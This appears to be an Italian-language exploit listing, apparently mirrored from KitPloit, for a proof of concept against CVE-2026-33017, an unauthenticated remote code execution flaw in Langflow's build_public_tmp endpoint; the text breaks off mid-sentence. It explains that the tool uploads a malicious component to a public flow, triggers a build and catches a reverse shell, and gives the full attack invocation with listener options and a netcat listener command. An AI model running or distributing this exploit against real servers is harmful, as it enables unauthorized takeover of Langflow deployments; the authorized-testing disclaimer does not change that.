## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TATOSEC-CVE-2026-33017-LANGFLOP
# CVE-2026-33017 Langflow ("Langflop") PoC di RCE non autenticata
PoC per la falla di esecuzione di codice non autenticata `build_public_tmp` in Langflow. Carica un componente dannoso in un flusso pubblico, attiva una build e cattura una reverse shell.
**Solo per test di sicurezza autorizzati.** Utilizza esclusivamente su sistemi che possiedi o per i quali hai esplicita autorizzazione al test.
## Requisiti
* Python 3
* `requests` (`pip install requests`)
## Utilizzo
Avvia il listener integrato e lancia l'exploit in un colpo solo:
root@kitploit:~
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
Quando la shell si connette, tenta automaticamente di effettuare l'upgrade a una shell completamente interattiva.
Se preferisci usare il tuo listener (es. `nc -lvnp 4444`), rimuovi :